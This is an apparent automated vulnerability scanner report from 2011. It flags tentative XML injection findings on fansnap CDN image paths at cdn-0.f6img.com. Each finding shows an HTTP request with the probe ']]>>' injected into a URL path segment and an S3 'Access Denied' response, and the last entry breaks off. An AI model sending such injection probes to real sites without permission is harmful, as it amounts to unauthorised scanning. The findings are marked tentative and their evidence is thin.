http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 7]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 1]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 2]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 3]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 4]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 5]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 6]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 7]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 1]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 2]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 3]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 4]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 5]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 6]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 7]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 1]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 2]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 3]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 4]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 5]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 6]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 7]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 1]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 2]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 3]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 4]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 5]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 6]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 7]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 1]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 2]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 3]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 4]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 5]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 6]
http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 7]

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

8.1. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/1px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/1px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3EB099E5C85ED1AD
x-amz-id-2: v1/0ARGrladU7/iQq6L0OhaM9DQvBvufNzFr69Ov+2YTAq7vZw9Y/e1JoelI4PjF
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:42 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7ab8fa1c8d8a2d18309dcff06214b59aa3c91867cd055dfaad415e85823703ffbd41f513b2a5546f
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3EB099E5C85ED1AD</RequestId><HostId>v1/0ARGrladU7/iQq6L0OhaM9DQvBvufNzFr69Ov+2YTAq7vZw
...[SNIP]...

8.2. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/1px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/1px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 2C5C890FB7018FD8
x-amz-id-2: BJ8a8o7cUm2zfdHlEefh4mIDt1I6Gi/59WRVsqnwdQjcA5c9pdXNqdBIPHU8yPbZ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a547c93f7a372bf74e9f5aefc9b990277ebd8b8a2813b2ca76ffd2b02b4546c6a6b3488713d505c9
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>2C5C890FB7018FD8</RequestId><HostId>BJ8a8o7cUm2zfdHlEefh4mIDt1I6Gi/59WRVsqnwdQjcA5c9pd
...[SNIP]...

8.3. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/1px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/1px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D7D0308E692C1837
x-amz-id-2: l0+wvdYbAIuKKy7/RDLj3cdp+gNR8yyluI4ezTCZdEsVuX0FmtbyYxFXNvBuCNJB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0f5a70ab86d79067d7a08c06aa7507e172491a3a20eba8a71e0c55e8740239cc356cd4ad0e010ce6
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D7D0308E692C1837</RequestId><HostId>l0+wvdYbAIuKKy7/RDLj3cdp+gNR8yyluI4ezTCZdEsVuX0Fmt
...[SNIP]...

8.4. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AA2623B21FF77E94
x-amz-id-2: nEM8bH2KIaoliJmVNtxhjwS4QKXs6/5CfnlG/PNDmUIRITI1YbRzzxPEYomHDM3M
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4d0cbe48d11b0741d1b23eac659945b0dbc4232decb7c529c86c07a3860ce66c024b4e2dfd1d7c31
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AA2623B21FF77E94</RequestId><HostId>nEM8bH2KIaoliJmVNtxhjwS4QKXs6/5CfnlG/PNDmUIRITI1Yb
...[SNIP]...

8.5. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8ECE51982D15406C
x-amz-id-2: jVeoEzqBDbyLmUZ7H3uahL+5Lr9ZoE87jppicd1pISc0PbUMdoRGpC0pMAJUsI4O
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 54fef84fc635d94ff5faec609d33531fedf6c231f7f01c22135b50e95bf30bd39e1595d9148f10c2
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8ECE51982D15406C</RequestId><HostId>jVeoEzqBDbyLmUZ7H3uahL+5Lr9ZoE87jppicd1pISc0PbUMdo
...[SNIP]...

8.6. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 791F535E8E4273CC
x-amz-id-2: 4WzY4vMXvpFzkb1Z4KxNFqctS1tHQXVLn/xxx+RcHx65NPDIcEHFq+BFqJHw2NzX
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c336a5ddb5f0d32bf68147cf00312507238dcb9422d2a6995fa14f566427b289c74de399c9ce6840
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>791F535E8E4273CC</RequestId><HostId>4WzY4vMXvpFzkb1Z4KxNFqctS1tHQXVLn/xxx+RcHx65NPDIcE
...[SNIP]...

8.7. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-15.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5539AF809BCD156D
x-amz-id-2: ZiwP2oPRz4kIyb0dOdqGaGPrsyZIKJD+m8oReCfUByr9NSEEokN+KOUwCLQeo5Te
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:01 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 799b4ccab57887ac26d515ecfa0205b546848c55c9a02057e951d4700d439d9ec4c88e70e7b3e385
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5539AF809BCD156D</RequestId><HostId>ZiwP2oPRz4kIyb0dOdqGaGPrsyZIKJD+m8oReCfUByr9NSEEok
...[SNIP]...

8.8. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 79ABACABB7FEB232
x-amz-id-2: 2Siw4EHg7GfQq2oWtOSY5JHhlojFzLMItgBM62LN4TVAIRQHUg+qFHmP+Zuayldi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:46 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d22f553beedf6f9ce364ab622cc0696be3b6533a8104d26a08c6900011b4d1a08149b8a1b5c8cb60
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>79ABACABB7FEB232</RequestId><HostId>2Siw4EHg7GfQq2oWtOSY5JHhlojFzLMItgBM62LN4TVAIRQHUg
...[SNIP]...

8.9. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B4EEB6055894B254
x-amz-id-2: 6M8RBkeD3Fr+ShDOTvngA7A3xTtdtleHtq4aAjUqqyCUYEMh+HO0KkqaS1LDB70r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6426b2b08ef5bafc1fcff9fce48bfafc1087efed0dc018350891fe58c44226f4da697aa9e3350350
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B4EEB6055894B254</RequestId><HostId>6M8RBkeD3Fr+ShDOTvngA7A3xTtdtleHtq4aAjUqqyCUYEMh+H
...[SNIP]...

8.10. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-15.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C9E78FBE6715807B
x-amz-id-2: CPYlOnTFv9eD6KoQ1J8HDfVTBp9oqcfdFyzPbxS3Pvrn4eiT03PqmXHFp9O8dN4R
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4474b8092af040f2351707ea0922e9f90357303a50bffb5d621962730a74a118f15ab3be423a8e18
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C9E78FBE6715807B</RequestId><HostId>CPYlOnTFv9eD6KoQ1J8HDfVTBp9oqcfdFyzPbxS3Pvrn4eiT03
...[SNIP]...

8.11. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-15.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5CF1A090273BDBF6
x-amz-id-2: hpM/klLX3QWRgm1K2g0lfT9/rpVjB4/2a/j1Vv1Fy1F4pr+eHsnsNk936pD989sK
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 038c8aaba8c3d54fd459b6ad5c065eae6eb4da0cbcbb5df51bd4a82d57927095d86417af467ecade
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5CF1A090273BDBF6</RequestId><HostId>hpM/klLX3QWRgm1K2g0lfT9/rpVjB4/2a/j1Vv1Fy1F4pr+eHs
...[SNIP]...

8.12. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/best-valuepoint-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C6A63C6825263473
x-amz-id-2: 59QoP3VpLFeK40GfoaGriehjnznyt3i4w7/f0CiKMSIma3UIG5KOUdqlnlGBA/bw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 65229e81acf69a2dc8c8a095cf0ef4b90c25e2f84d992767292cb3ebaab05715c17d917dc167c9fd
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C6A63C6825263473</RequestId><HostId>59QoP3VpLFeK40GfoaGriehjnznyt3i4w7/f0CiKMSIma3UIG5
...[SNIP]...

8.13. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/markers/best-valuepoint-17px.png

Issue detail

Request

